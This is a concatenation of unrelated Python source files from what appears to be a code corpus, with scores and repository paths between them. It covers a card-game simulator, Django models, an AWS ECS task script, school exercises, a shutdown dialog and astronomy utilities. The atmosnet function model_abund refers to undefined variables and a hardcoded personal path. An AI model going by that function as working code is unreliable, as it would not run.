Augoeides", CardType.EXTRA_DECK) purgatrio = Card("Invoked Purgatrio", CardType.EXTRA_DECK) omega = Card("Psy-framelord Omega", CardType.EXTRA_DECK) verte = Card("Predaplant Verte Anaconda", CardType.EXTRA_DECK) dragoon = Card("Red-Eyes Dark Dragoon", CardType.EXTRA_DECK) # Disruptions disr_dragoon = Disruption(repr(dragoon), 8) disr_mechaba_m = Disruption(f"{repr(mechaba)} (M)", 2) disr_mechaba_s = Disruption(f"{repr(mechaba)} (S)", 0) disr_mechaba_t = Disruption(f"{repr(mechaba)} (T)", 0) disr_prison = Disruption(repr(prison), 2) disr_judgment = Disruption(repr(judgment), 2) disr_aleister = Disruption(repr(aleister), 1) # Lists hand_traps = (ash, ogre, veiler, imperm, nibiru, droll, crow, belle, meister, gamma) protection = (belle, called) cards_to_set = (judgment, droplet, called, imperm, prison, cyclone) discards = (driver, duster, mind_control, upstart, cyclone) light_monsters = (corobane, candina, artemis, gardna, fleur) not_opt = (imperm, crow, meister, veiler, cyclone) going_second = (duster, mind_control) verte_materials = ( aleister, candina, corobane, souls, jester, fleur, ) # artemis, almiraj, gardna? standard_decklist = DeckList( ( (aleister, 3), (invocation, 2), (meltdown, 3), (terraforming, 1), (prison, 2), (imperm, 3), (ash, 3), (souls, 3), (dm, 2), # (fleur, 1), (red_eyes, 2), (ref, 3), (magicalized_fusion, 1), (candina, 1), (corobane, 1), (lightstage, 1), # (upstart, 1), (cyclone, 2), (judgment, 2), (upstart, 1), (duster, 1), (mind_control, 1), (set_rotation, 1), (called, 1), ), ( (almiraj, 1), (artemis, 1), (gardna, 1), (mechaba, 2), (purgatrio, 1), (augoeides, 1), (omega, 1), (dragoon, 2), (verte, 2), ), ) default_decklist = standard_decklist ######### # Helpers ######### @classmethod def generate_stats(cls, end_games: List[Game]) -> List[List[str]]: return [ ["Dragoon", cls.percent_with_flags(end_games, ["dragoon"])], ["Mechaba", cls.percent_with_flags(end_games, ["mechaba"])], ["Both", cls.percent_with_flags(end_games, ["dragoon", "mechaba"])], ["3+ Disruptions", cls.percent_with_flags(end_games, ["3+ disruptions"])], ["Bricks", cls.percent_with_flags(end_games, ["brick"])], ] def postprocess(self, game: Game): return game def endphase(self, game: Game): for card in game.hand.cards[:]: # make a copy so we can modify hand if card in self.cards_to_set: game.move(game.hand, game.backrow, card) # Process Disruptions pure_distruptions = 0 if self.dragoon in game.monsters and len(game.hand): game.add_flag("dragoon") game.disruptions.add(self.disr_dragoon) pure_distruptions += 1 if self.mechaba in game.monsters: for card in game.hand: game.add_flag("mechaba") if card.card_type == CardType.MONSTER: game.disruptions.add(self.disr_mechaba_m) elif card.card_type == CardType.SPELL: game.disruptions.add(self.disr_mechaba_s) elif card.card_type == CardType.TRAP: game.disruptions.add(self.disr_mechaba_t) if game.has_flag("mechaba"): pure_distruptions += 1 for card in game.hand: if card in self.hand_traps: if card == self.gamma and self.driver in game.banished: continue if card == self.imperm: continue pure_distruptions += 1 game.disruptions.add(Disruption(repr(card), 1)) for card in game.backrow: if card in self.cards_to_set: pure_distruptions += 1 if card == self.prison: game.disruptions.add(self.disr_prison) elif card == self.judgment: game.disruptions.add(self.disr_judgment) else: game.disruptions.add(Disruption(repr(card), 1)) if pure_distruptions >= 3: game.add_flag("3+ disruptions") if pure_distruptions < 3 and not game.has_flag("dragoon"): game.add_flag("brick") return game def get_redundant_cards_in_hand( self, game: Game, include_useful: bool = False ) -> List[Card]: redundant_cards = {} # higher value means more redundant hand = game.hand.cards[:] for card in hand: if count := hand.count(card) == 1: if game.hopt_available(card): redundant_cards[card] = 0 else: redundant_cards[card] = 2 elif count == 2: if card in self.not_opt: redundant_cards[card] = 1 else: redundant_cards[card] = 2 else: redundant_cards[card] = 3 to_return = sorted( redundant_cards.keys(), key=lambda x: redundant_cards[x], reverse=True ) if include_useful: return to_return else: return [card for card in to_return if redundant_cards[card] > 1] def find_dragoons_materials( self, game: Game ) -> Tuple[Optional[CardGroup], Optional[CardGroup]]: dm_location, red_eyes_location = None, None if self.dm in game.deck: dm_location = game.deck elif self.dm in game.hand: dm_location = game.hand if self.red_eyes in game.deck: red_eyes_location = game.deck elif self.red_eyes in game.hand: red_eyes_location = game.hand return dm_location, red_eyes_location ######### # Selects ######### def select_invocation_banish_from_grave(self, game: Game) -> Optional[Card]: return game.grave.get_any(self.light_monsters) def select_invocation_banish_from_field(self, game: Game) -> Optional[Card]: return game.monsters.get_any(self.light_monsters) def select_souls_dump(self, game: Game) -> Optional[Card]: if self.dm in game.deck: return self.dm else: return None def select_souls_fodder(self, game: Game, count: int) -> List[Card]: fodder = [] cards = self.get_redundant_cards_in_hand(game, include_useful=False) while cards and len(fodder) < count: card = cards.pop() if card.card_type in [CardType.SPELL, CardType.TRAP]: fodder.append(card) return fodder def select_terraforming_target(self, game: Game) -> Optional[Card]: if ( self.meltdown in game.deck and game.hopt_available(self.meltdown) and self.meltdown not in game.hand and self.aleister not in game.hand ): return self.meltdown elif ( self.lightstage in game.deck and self.lightstage not in game.hand and not (self.corobane in game.hand and self.candina in game.hand) ): return self.lightstage elif self.meltdown in game.deck: return self.meltdown elif self.lightstage in game.deck: return self.lightstage else: return None def select_set_rotation_targets(self, game: Game) -> List[Card]: my_card, opp_card = None, None if self.meltdown in game.hand or self.aleister in game.hand: # we have a path to aleister. give them meltdown and take stage for corobane if self.lightstage in game.deck: my_card = self.lightstage if self.meltdown in game.deck: opp_card = self.meltdown else: if self.meltdown in game.deck: my_card = self.meltdown if self.lightstage in game.deck: opp_card = self.lightstage return my_card, opp_card ######### # Actions ######### def action_use_upstart(self, game: Game) -> Optional[Game]: if self.upstart in game.hand and len(game.deck) > 1: game.move(game.hand, game.grave, self.upstart) game.draw() return game def action_use_terraforming(self, game: Game) -> Optional[Game]: if self.terraforming in game.hand and game.hopt_available(self.terraforming): target = self.select_terraforming_target(game) if not target: return None game.move(game.hand, game.grave, self.terraforming) game.move(game.deck, game.hand, target) game.use_hopt(self.terraforming) return game def action_use_set_rotation(self, game: Game) -> Optional[Game]: if self.set_rotation in game.hand: my_card, opp_card = self.select_set_rotation_targets(game) if not (my_card and opp_card): return None else: game.use_resource("activate field spell") game.move(game.hand, game.grave, self.set_rotation) game.move(game.deck, game.backrow, my_card) game.deck.cards.remove(opp_card) return game def action_use_meltdown(self, game: Game) -> Optional[Game]: if ( self.meltdown in game.hand and game.hopt_available(self.meltdown) and game.resource_available("activate field spell") ): game.move(game.hand, game.backrow, self.meltdown) game.use_hopt(self.meltdown) if self.aleister in game.deck: game.move(game.deck, game.hand, self.aleister) return game def action_summon_aleister(self, game: Game) -> Optional[Game]: if ( self.aleister in game.hand and game.resource_available("normal summon") and game.resource_available("summon") ): game.move(game.hand, game.monsters, self.aleister) game.use_resource("normal summon") if self.invocation in game.deck: game.move(game.deck, game.hand, self.invocation) game.use_hopt(self.aleister) return game def action_summon_artemis(self, game: Game) -> Optional[Game]: if self.artemis in game.extra_deck and game.resource_available("summon"): if self.aleister in game.monsters: game.move(game.monsters, game.grave, self.aleister) elif self.jester in game.monsters: game.move(game.monsters, game.grave, self.jester) elif self.souls in game.monsters: game.move(game.monsters, game.grave, self.souls) else: return None game.move(game.extra_deck, game.monsters, self.artemis) return game def action_summon_almiraj(self, game: Game) -> Optional[Game]: if ( self.almiraj in game.extra_deck and self.aleister in game.monsters and game.resource_available("summon") ): game.move(game.monsters, game.grave, self.aleister) game.move(game.extra_deck, game.monsters, self.almiraj) return game def action_summon_gardna(self, game: Game) -> Optional[Game]: if ( self.gardna in game.extra_deck and self.almiraj in game.monsters and game.resource_available("summon") ): game.move(game.monsters, game.grave, self.almiraj) game.move(game.extra_deck, game.monsters, self.gardna) return game def action_summon_souls(self, game: Game) -> Optional[Game]: if ( self.souls in game.hand and game.hopt_available(self.souls, "summon") and game.resource_available("summon") ): dump_target = self.select_souls_dump(game) if not dump_target: return None game.move(game.deck, game.grave, dump_target) game.move(game.hand, game.monsters, self.souls) game.use_hopt(self.souls, "summon") return game def action_normal_summon_souls(self, game: Game) -> Optional[Game]: if ( self.souls in game.hand and game.resource_available("normal summon") and game.resource_available("summon") ): game.use_resource("normal summon") game.move(game.hand, game.monsters, self.souls) return game def action_use_souls(self, game: Game) -> Optional[Game]: if self.souls in game.monsters and game.hopt_available(self.souls, "draw"): game.use_hopt(self.souls, "draw") if self.meltdown in game.backrow: game.move(game.backrow, game.grave, self.meltdown) game.draw() fodder = self.select_souls_fodder(game, 1) if fodder: game.move(game.hand, game.grave, fodder[0]) game.draw() else: fodder = self.select_souls_fodder(game, 2) if not fodder: return None while fodder: game.move(game.hand, game.grave, fodder.pop()) game.draw() return game def action_summon_jester(self, game: Game) -> Optional[Game]: if ( self.jester in game.hand and game.hopt_available(self.jester) and game.resource_available("summon") ): game.move(game.hand, game.monsters, self.jester) game.use_hopt(self.jester) return game def action_normal_summon_jester(self, game: Game) -> Optional[Game]: if ( self.jester in game.hand and game.resource_available("normal summon") and game.resource_available("summon") ): game.use_resource("normal summon") game.move(game.hand, game.monsters, self.jester) return game def action_summon_corobane(self, game: Game) -> Optional[Game]: if ( self.corobane in game.hand and game.hopt_available(self.corobane) and not game.monsters.cards and game.resource_available("summon") ): game.move(game.hand, game.monsters, self.corobane) game.use_hopt(self.corobane) return game def action_normal_summon_candina(self, game: Game) -> Optional[Game]: if ( self.candina in game.hand and game.resource_available("normal summon") and game.resource_available("summon") ): game.use_resource("normal summon") game.move(game.hand, game.monsters, self.candina) if self.lightstage in game.deck: game.move(game.deck, game.hand, self.lightstage) elif self.corobane in game.deck: game.move(game.deck, game.hand, self.corobane) return game def action_use_lightstage(self, game: Game) -> Optional[Game]: if ( self.lightstage in game.hand and any(card in game.deck for card in [self.corobane, self.candina]) and game.resource_available("activate field spell") ): if self.meltdown in game.hand or self.aleister in game.hand: game.move(game.hand, game.backrow, self.lightstage) # search corobane, alesiter will be normaled if self.corobane in game.deck: game.move(game.deck, game.hand, self.corobane) elif self.candina in game.deck: game.move(game.deck, game.hand, self.candina) return game else: game.move(game.hand, game.backrow, self.lightstage) # search candina to normal if self.candina in game.deck: game.move(game.deck, game.hand, self.candina) elif self.corobane in game.deck: game.move(game.deck, game.hand, self.corobane) return game def action_summon_mechaba(self, game: Game) -> Optional[Game]: if ( self.invocation in game.hand and self.mechaba in game.extra_deck and game.resource_available("summon") ): if self.aleister in game.grave: game.move(game.grave, game.banished, self.aleister) elif self.aleister in game.monsters: game.move(game.monsters, game.banished, self.aleister) else: return None if grave_target := self.select_invocation_banish_from_grave(game): game.move(game.grave, game.banished, grave_target) elif field_target := self.select_invocation_banish_from_field(game): game.move(game.monsters, game.banished, field_target) else: return None game.move(game.hand, game.grave, self.invocation) game.move(game.extra_deck, game.monsters, self.mechaba) if game.hopt_available(self.invocation, "recycle"): game.use_hopt(self.invocation, "recycle") game.move(game.grave, game.deck, self.invocation) game.move(game.banished, game.hand, self.aleister) game.deck.shuffle() return game def action_summon_verte(self, game: Game) -> Optional[Game]: if self.verte in game.extra_deck and game.resource_available("summon"): materials = [] monsters = game.monsters.cards[:] while len(materials) < 2 and monsters: card = monsters.pop() if card in self.verte_materials: materials.append(card) if len(materials) < 2: return None for material in materials: game.move(game.monsters, game.grave, material) game.move(game.extra_deck, game.monsters, self.verte) return game def action_use_verte(self, game: Game) -> Optional[Game]: if ( self.verte in game.monsters and game.hopt_available(self.verte) and self.ref in game.deck and self.dragoon in game.extra_deck ): dm_location, red_eyes_location = self.find_dragoons_materials(game) if not (dm_location and red_eyes_location): return None game.use_hopt(self.verte) game.move(game.deck, game.grave, self.ref) game.move(dm_location, game.grave, self.dm) game.move(red_eyes_location, game.grave, self.red_eyes) game.move(game.extra_deck, game.monsters, self.dragoon) game.use_resource("summon") return game def action_use_ref(self, game: Game) -> Optional[Game]: if ( self.ref in game.hand and self.dragoon in game.extra_deck and not game.monsters.cards ): dm_location, red_eyes_location = self.find_dragoons_materials(game) if not (dm_location and red_eyes_location): return None game.move(game.hand, game.grave, self.ref) game.move(dm_location, game.grave, self.dm) game.move(red_eyes_location, game.grave, self.red_eyes) game.move(game.extra_deck, game.monsters, self.dragoon) game.use_resource("summon") return game def action_summon_fleur(self, game: Game) -> Optional[Game]: if ( self.fleur in game.hand and game.resource_available("summon") and any(card.card_type == CardType.EXTRA_DECK for card in game.monsters) ): game.move(game.hand, game.monsters, self.fleur) return game
2.375
2
py/g1/messaging/g1/messaging/parts/inprocs.py
clchiou/garage
3
12789860
<filename>py/g1/messaging/g1/messaging/parts/inprocs.py from g1.bases import labels from ..reqrep import inprocs SERVER_LABEL_NAMES = ( # Input. 'server', ) def define_server(module_path=None): module_path = module_path or inprocs.__name__ module_labels = labels.make_labels(module_path, *SERVER_LABEL_NAMES) setup_server(module_labels) return module_labels def setup_server(module_labels): del module_labels # Unused.
1.90625
2
src/data.py
szarta/stars-reborn
0
12789861
""" data.py Contains and owns the loading and in-memory storage of all of the pre-defined game data. :author: <NAME> :license: MIT, see LICENSE.txt for more details. """ import json import jsonpickle import gzip Technologies = {} Language_Map = {} def load_language_map(filepath): f = open(filepath, "r") Language_Map.update(json.load(f)) f.close() def load_technologies(filepath): f = gzip.open(filepath, "rb") contents = f.read() f.close() Technologies.update(jsonpickle.decode(contents, keys=True)) def load_tutorial_game(tutorial_filepath): f = gzip.open(tutorial_filepath, "rb") contents = f.read() f.close() game = jsonpickle.decode(contents, keys=True) return game
2.59375
3
mlxtend/mlxtend/_base/__init__.py
WhiteWolf21/fp-growth
0
12789862
# <NAME> 2014-2020 # mlxtend Machine Learning Library Extensions # Author: <NAME> <<EMAIL>> # # License: BSD 3 clause from ._base_model import _BaseModel from ._cluster import _Cluster from ._classifier import _Classifier from ._regressor import _Regressor from ._iterative_model import _IterativeModel from ._multiclass import _MultiClass from ._multilayer import _MultiLayer __all__ = ["_BaseModel", "_Cluster", "_Classifier", "_Regressor", "_IterativeModel", "_MultiClass", "_MultiLayer"]
1.039063
1
apps/challenge/resources.py
mehrbodjavadi79/AIC21-Backend
3
12789863
from django.conf import settings from import_export import resources, fields from .models import Match class MatchResource(resources.ModelResource): team1 = fields.Field(attribute='team1__name', column_name='team1') team2 = fields.Field(attribute='team2__name', column_name='team2') winner = fields.Field(attribute='winner__name', column_name='winner') game_log = fields.Field() server_log = fields.Field() visualizer_url = fields.Field() class Meta: model = Match fields = ('team1', 'team2', 'winner', 'infra_token', 'game_log', 'server_log', 'visualizer_url') def dehydrate_game_log(self, obj: Match): return obj.game_log def dehydrate_server_log(self, obj: Match): return obj.server_log def dehydrate_visualizer_url(self, obj: Match): return f'{settings.VISUALIZER_URL}{obj.game_log}'
2.1875
2
dataset/index_file_by_accession.py
fubiye/edgar-abs-kg
0
12789864
import os import json BASE_DIR = r'D:\data\edgar\sampling\Archives\edgar\data' if __name__ == '__main__': index = dict() for cik in os.listdir(BASE_DIR): for accession in os.listdir(os.path.join(BASE_DIR, cik)): for fileName in os.listdir(os.path.join(BASE_DIR, cik, accession)): index[accession] = { "cik": cik, "accession": accession, "fileName": fileName } with open('index_by_accession.json', 'w') as index_json: json.dump(index, index_json)
2.609375
3
area51/apps.py
tailorv/neighbourshood
0
12789865
<gh_stars>0 from django.apps import AppConfig class HoodappConfig(AppConfig): name = 'area51' def ready(self): import area51.signals
1.390625
1
model/load_data.py
Seraphyx/senti
0
12789866
<reponame>Seraphyx/senti<gh_stars>0 import csv import sklearn from sklearn.datasets import load_files data_path = "../data/raw/movie_reviews" class data(object): def __init__(self, file=None, dataset=None): self.file = file self.dataset = dataset self.read_dataset() def read_tsv(self): with open(self.file,'rb') as tsvin: tsvin = csv.reader(tsvin, delimiter='\t') for i, row in iter(tsvin): print(row) if i > 10: break self.data = tsvin def read_acllmdb(self): # Movie review Sentiment: http://www.nltk.org/nltk_data/ movie_train = load_files(data_path, shuffle=True) self.data = { 'x': [x.decode("utf-8") for x in movie_train.data], 'y': movie_train.target } def read_dataset(self): # Toy datasets are set here if self.dataset == 'acllmdb': self.read_acllmdb() elif self.dataset == 'tsv': self.read_tsv() else: print("No dataset provided.") class DataBatch(object): def __init__(self, path, data): self.path = path self.data = data if __name__ == '__main__': movie_train = data(dataset='acllmdb') print(type(movie_train.data)) print(len(movie_train.data['x'])) print(len(movie_train.data['y'])) # print(movie_train.keys()) # print(movie_train.DESCR) # print(movie_train.filenames) # print(movie_train.data[0:3]) # ds = Dataset(data.data['x'], data.data['y']).load('../data/dataset/dataset_example') # import numpy as np # doc_zeros = np.zeros(100) # print(doc_zeros.shape) # test = [1,2,3,4] # print(test) # test = np.array(test) # print(test) # print(test.shape) # doc_zeros[:test.size] = test # print(doc_zeros) # print(doc_zeros.shape) # print(test.size) # print(min(100, test.size))
3.09375
3
docker/app/boto-ecs.py
094459/blogpost-airflow-hybrid
1
12789867
<filename>docker/app/boto-ecs.py import boto3 import json # Thanks to https://hands-on.cloud/working-with-ecs-in-python-using-boto3/ for a good cheatsheet client = boto3.client("ecs", region_name="eu-west-2") ## create a new task in ecs response = client.register_task_definition( containerDefinitions=[ { "name": "airflow-hybrid-boto3", "image": "public.ecr.aws/a4b5h6u6/beachgeek:latest", "cpu": 0, "portMappings": [], "essential": True, "environment": [], "mountPoints": [], "volumesFrom": [], "command": ["ricsue-airflow-hybrid","period1/temp.csv", "select * from customers WHERE location = \"China\"", "rds-airflow-hybrid","eu-west-2"], "logConfiguration": { "logDriver": "awslogs", "options": { "awslogs-group": "/ecs/test-external", "awslogs-region": "eu-west-2", "awslogs-stream-prefix": "ecs" } } } ], taskRoleArn="arn:aws:iam::704533066374:role/ecsTaskExecutionRole", #taskDefinitionArn="arn:aws:ecs:eu-west-2:704533066374:task-definition/test-external:5", executionRoleArn="arn:aws:iam::704533066374:role/ecsTaskExecutionRole", family= "test-external", networkMode="bridge", requiresCompatibilities= [ "EXTERNAL" ], cpu= "256", memory= "512") print(json.dumps(response, indent=4, default=str)) # it will automatically use the latest version # ideally you do not want this as this might impact idempotency # so configure an explict version new_taskdef=json.dumps(response['taskDefinition']['revision'], indent=4, default=str) print("TaskDef is now at :" + str(new_taskdef)) #run task # explicity set taskdef response2 = client.run_task( cluster='test-hybrid', count=1, launchType='EXTERNAL', taskDefinition='test-external:{taskdef}'.format(taskdef=new_taskdef) ) print(json.dumps(response2, indent=4, default=str))
2.515625
3
exos/isn/ds1.py
ewen-lbh/school-stuff
0
12789868
x = 237 a = int(x / 100) x = x - 100 * a b = int(x / 10) x = x - 10 * b c = x Resultat = a + b * 10 + c * 100 print(Resultat) # >>> 732 L = [12, 8, 19, 7, 3, 10] Resultat = [20 - L[i] for i in range(len(L))] print(Resultat) ## >>> [8, 12, 1, 13, 17, 10] Resultat = 0 for i in range(5): Resultat += i + 1 print(Resultat) ## >>> 15 L = [i for i in range(10)] for i in range(len(L)): if i >= 1: L[i] = L[i] + L[i - 1] Resultat = L print(Resultat) ## >>> [0, 1, 3, 6, 10, 15, 21, 28, 36, 45] Val, i = 0, 0 L = [7, 14, 21, 45, 52, 67, 89, 99] while Val <= 50: i += 1 Val = L[i] Resultat = [i, Val] print(Resultat) ## >>> [4, 52] Somme = 0 n = 10 for i in range(n): # il manque les deux points Somme += i # indentation incorrecte print(Somme) # il manque la majuscule à Somme ## >>>> 45 from math import pi Rayon = float(input("Rayon [m] ? > ")) # il manque les "" Aire = pi * Rayon ** 2 # l' exposant se note ** et pas ^ Perimetre = 2 * pi * Rayon # il manque la majuscule à Rayon print(f"Aire: {Aire}, Périmètre: {Perimetre}") # f-strings! # Rayon [m] ? > 45 # >>> Aire: 6361.725123519331, Périmètre: 282.7433388230814 import random n = 10000 L = [random.randint(0, 1000) for i in range(n)] a = 0 b = 0 c = 0 for i in range(len(L)): if L[i] < 500: a += 1 elif L[i] > 500: # else if ~> elif b += 1 else: c += 1 print(a, b, c) ##3 Code non fonctionnel a = 25 b = 226 a = max(a, b) b = min(a, b) r = a i = 0 while r >= b: i += 1 r -= b print(a, " = ", b, " * ", i, "+", r) ##1 a = 25 b = 226 a1 = max(a, b) b = min(a, b) r = a1 i = 0 while r >= b: i += 1 r -= b print(a1, " = ", b, " * ", i, " + ", r) # 4 Ecriture de code # la fonction def decompose(l) qui prend en paramètres une liste l d'entiers et retourne deux listes def decompose(l): rp, ri = [], [] for i in range(len(l)): if l[i] % 2 == 0: rp.append(l[i]) else: ri.append(l[i]) return rp, ri # ##une fonction def present(l,a) qui prend en paramètres une liste d'entiers l et un entier a et ##retourne le nombre de multiples de a dans la liste. def present(l, a): c = 0 for i in range(len(l)): if l[i] % a == 0: c += 1 return c
3.34375
3
build.py
iscc/iscc-core
5
12789869
<gh_stars>1-10 # -*- coding: utf-8 -*- """ Build cython extension modules. The shared library can also be built manually using the command: $ cythonize -X language_level=3 -a -i ./iscc_core/cdc.py $ cythonize -X language_level=3 -a -i ./iscc_core/minhash.py $ cythonize -X language_level=3 -a -i ./iscc_core/simhash.py """ def build(setup_kwargs): try: from Cython.Build import cythonize, build_ext setup_kwargs.update( dict( ext_modules=cythonize( [ "iscc_core/cdc.py", "iscc_core/minhash.py", "iscc_core/simhash.py", ] ), cmdclass=dict(build_ext=build_ext), ) ) print("************************************************************") print("Succeeded to compile Cython/C accelerator modules :) *") print("************************************************************") except Exception as e: print("************************************************************") print("Cannot compile C accelerator module, use pure python version") print("************************************************************") print(e)
2.15625
2
ctrl-alt-del.py
troglobit/awesome-config
5
12789870
<filename>ctrl-alt-del.py<gh_stars>1-10 #!/usr/bin/env python import pygtk pygtk.require('2.0') import gtk import os if __name__ == "__main__": dialog = gtk.MessageDialog(type=gtk.MESSAGE_WARNING) dialog.set_position(gtk.WIN_POS_CENTER) dialog.set_markup("<big><b>Shutdown computer now?</b></big>") dialog.add_button("Log Out", 0) dialog.add_button("Sleep", 1) dialog.add_button("Restart", 2) dialog.add_button("Shut Down", 3) dialog.add_button("Cancel", 10) action = dialog.run() if action == 0: os.system("awesome-client 'awesome.quit()'"); elif action == 1: os.system("systemctl suspend"); elif action == 2: os.system("systemctl reboot"); elif action == 3: os.system("systemctl poweroff"); exit(0)
2.734375
3
malcolm/modules/ADPandABlocks/parts/pandablocksdriverpart.py
MattTaylorDLS/pymalcolm
0
12789871
<reponame>MattTaylorDLS/pymalcolm from malcolm.modules.ADCore.parts import DetectorDriverPart from .pandablockschildpart import PandABlocksChildPart class PandABlocksDriverPart(DetectorDriverPart, PandABlocksChildPart): pass
1.445313
1
crud/migrations/0009_auto_20210701_0910.py
TownOneWheel/townonewheel
0
12789872
<filename>crud/migrations/0009_auto_20210701_0910.py # Generated by Django 3.2.4 on 2021-07-01 09:10 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('crud', '0008_auto_20210701_0715'), ] operations = [ migrations.AlterField( model_name='cat', name='color', field=models.CharField(blank=True, max_length=20, null=True), ), migrations.AlterField( model_name='cat', name='gender', field=models.CharField(blank=True, max_length=20, null=True), ), migrations.AlterField( model_name='cat', name='neutering', field=models.CharField(blank=True, max_length=10, null=True), ), ]
1.671875
2
investing_algorithm_framework/app/stateless/action_handlers/action_handler_strategy.py
investing-algorithms/investing-algorithm-framework
1
12789873
<reponame>investing-algorithms/investing-algorithm-framework from abc import ABC, abstractmethod class ActionHandlerStrategy(ABC): @abstractmethod def handle_event(self, payload, context): pass
2.078125
2
atmosnet/utils.py
dnidever/atmosnet
0
12789874
<gh_stars>0 #!/usr/bin/env python """UTILS.PY - Utility functions """ from __future__ import print_function __authors__ = '<NAME> <<EMAIL>>' __version__ = '20210605' # yyyymmdd import os import numpy as np import warnings from scipy import sparse from scipy.interpolate import interp1d from dlnpyutils import utils as dln import matplotlib.pyplot as plt try: import __builtin__ as builtins # Python 2 except ImportError: import builtins # Python 3 # Ignore these warnings, it's a bug warnings.filterwarnings("ignore", message="numpy.dtype size changed") warnings.filterwarnings("ignore", message="numpy.ufunc size changed") cspeed = 2.99792458e5 # speed of light in km/s def getprintfunc(inplogger=None): """ Allows you to modify print() locally with a logger.""" # Input logger if inplogger is not None: return inplogger.info # Check if a global logger is defined elif hasattr(builtins,"logger"): return builtins.logger.info # Return the buildin print function else: return builtins.print # The atmosnet data directory def datadir(): """ Return the atmosnet data/ directory.""" fil = os.path.abspath(__file__) codedir = os.path.dirname(fil) datadir = codedir+'/data/' return datadir # Split a filename into directory, base and fits extensions def splitfilename(filename): """ Split filename into directory, base and extensions.""" fdir = os.path.dirname(filename) base = os.path.basename(filename) exten = ['.fit','.fits','.fit.gz','.fits.gz','.fit.fz','.fits.fz'] for e in exten: if base[-len(e):]==e: base = base[0:-len(e)] ext = e break return (fdir,base,ext) def model_abund(pars): """ Model atmosphere abundances. """ # Create the input 99-element abundance array pertab = Table.read('/home/dnidever/payne/periodic_table.txt',format='ascii') #inpabund = np.zeros(99,np.float64) #g, = np.where(np.char.array(labels.dtype.names).find('_H') != -1) #ind1,ind2 = dln.match(np.char.array(labels.dtype.names)[g],np.char.array(pertab['symbol']).upper()+'_H') #inpabund[ind2] = np.array(labels[0])[g[ind1]] #feh = inpabund[25] #read model atmosphere atmostype, teff, logg, vmicro2, mabu, nd, atmos = synple.read_model(modelfile) mlines = dln.readlines(modelfile) # solar abundances # first two are Teff and logg # last two are Hydrogen and Helium solar_abund = np.array([ 4750., 2.5, -10.99, -10.66, -9.34, -3.61, -4.21, -3.35, -7.48, -4.11, -5.80, -4.44, -5.59, -4.53, -6.63, -4.92, -6.54, -5.64, -7.01, -5.70, -8.89, -7.09, -8.11, -6.40, -6.61, -4.54, -7.05, -5.82, -7.85, -7.48, -9.00, -8.39, -9.74, -8.70, -9.50, -8.79, -9.52, -9.17, -9.83, -9.46, -10.58, -10.16, -20.00, -10.29, -11.13, -10.47, -11.10, -10.33, -11.24, -10.00, -11.03, -9.86, -10.49, -9.80, -10.96, -9.86, -10.94, -10.46, -11.32, -10.62, -20.00, -11.08, -11.52, -10.97, -11.74, -10.94, -11.56, -11.12, -11.94, -11.20, -11.94, -11.19, -12.16, -11.19, -11.78, -10.64, -10.66, -10.42, -11.12, -10.87, -11.14, -10.29, -11.39, -20.00, -20.00, -20.00, -20.00, -20.00, -20.00, -12.02, -20.00, -12.58, -20.00, -20.00, -20.00, -20.00, -20.00, -20.00, -20.00]) # scale global metallicity abu = solar_abund.copy() abu[2:] += feh # Now offset the elements with [X/Fe], [X/Fe]=[X/H]-[Fe/H] g, = np.where(np.char.array(labels.dtype.names).find('_H') != -1) ind1,ind2 = dln.match(np.char.array(labels.dtype.names)[g],np.char.array(pertab['symbol']).upper()+'_H') abu[ind2] += (np.array(labels[0])[g[ind1]]).astype(float) - feh # convert to linear abu[2:] = 10**abu[2:] # Divide by N(H) g, = np.where(np.char.array(mlines).find('ABUNDANCE SCALE') != -1) nhtot = np.float64(mlines[g[0]].split()[6]) abu[2:] /= nhtot # use model values for H and He abu[0:2] = mabu[0:2] return abu def elements(husser=False): """ Reads the solar elemental abundances From <NAME>'s synple package. Parameters ---------- husser: bool, optional when set the abundances adopted for Phoenix models by Huser et al. (2013) are adopted. Otherwise Asplund et al. (2005) are used -- consistent with the MARCS (Gustafsson et al. 2008) models and and Kurucz (Meszaros et al. 2012) Kurucz model atmospheres. Returns ------- symbol: numpy array of str element symbols mass: numpy array of floats atomic masses (elements Z=1-99) sol: numpy array of floats solar abundances N/N(H) """ symbol = [ 'H' ,'He','Li','Be','B' ,'C' ,'N' ,'O' ,'F' ,'Ne', 'Na','Mg','Al','Si','P' ,'S' ,'Cl','Ar','K' ,'Ca', 'Sc','Ti','V' ,'Cr','Mn','Fe','Co','Ni','Cu','Zn', 'Ga','Ge','As','Se','Br','Kr','Rb','Sr','Y' ,'Zr', 'Nb','Mo','Tc','Ru','Rh','Pd','Ag','Cd','In','Sn', 'Sb','Te','I' ,'Xe','Cs','Ba','La','Ce','Pr','Nd', 'Pm','Sm','Eu','Gd','Tb','Dy','Ho','Er','Tm','Yb', 'Lu','Hf','Ta','W' ,'Re','Os','Ir','Pt','Au','Hg', 'Tl','Pb','Bi','Po','At','Rn','Fr','Ra','Ac','Th', 'Pa','U' ,'Np','Pu','Am','Cm','Bk','Cf','Es' ] mass = [ 1.00794, 4.00260, 6.941, 9.01218, 10.811, 12.0107, 14.00674, 15.9994, 18.99840, 20.1797, 22.98977, 24.3050, 26.98154, 28.0855, 30.97376, 32.066, 35.4527, 39.948, 39.0983, 40.078, 44.95591, 47.867, 50.9415, 51.9961, 54.93805, 55.845, 58.93320, 58.6934, 63.546, 65.39, 69.723, 72.61, 74.92160, 78.96, 79.904, 83.80, 85.4678, 87.62, 88.90585, 91.224, 92.90638, 95.94, 98., 101.07, 102.90550, 106.42, 107.8682, 112.411, 114.818, 118.710, 121.760, 127.60, 126.90447, 131.29, 132.90545, 137.327, 138.9055, 140.116, 140.90765, 144.24, 145, 150.36, 151.964, 157.25, 158.92534, 162.50, 164.93032, 167.26, 168.93421, 173.04, 174.967, 178.49, 180.9479, 183.84, 186.207, 190.23, 192.217, 195.078, 196.96655, 200.59, 204.3833, 207.2, 208.98038, 209., 210., 222., 223., 226., 227., 232.0381, 231.03588, 238.0289, 237., 244., 243., 247., 247., 251., 252. ] if not husser: #Asplund, Grevesse and Sauval (2005), basically the same as #<NAME>., <NAME>., <NAME>. 2007, Space Science Review 130, 205 sol = [ 0.911, 10.93, 1.05, 1.38, 2.70, 8.39, 7.78, 8.66, 4.56, 7.84, 6.17, 7.53, 6.37, 7.51, 5.36, 7.14, 5.50, 6.18, 5.08, 6.31, 3.05, 4.90, 4.00, 5.64, 5.39, 7.45, 4.92, 6.23, 4.21, 4.60, 2.88, 3.58, 2.29, 3.33, 2.56, 3.28, 2.60, 2.92, 2.21, 2.59, 1.42, 1.92, -9.99, 1.84, 1.12, 1.69, 0.94, 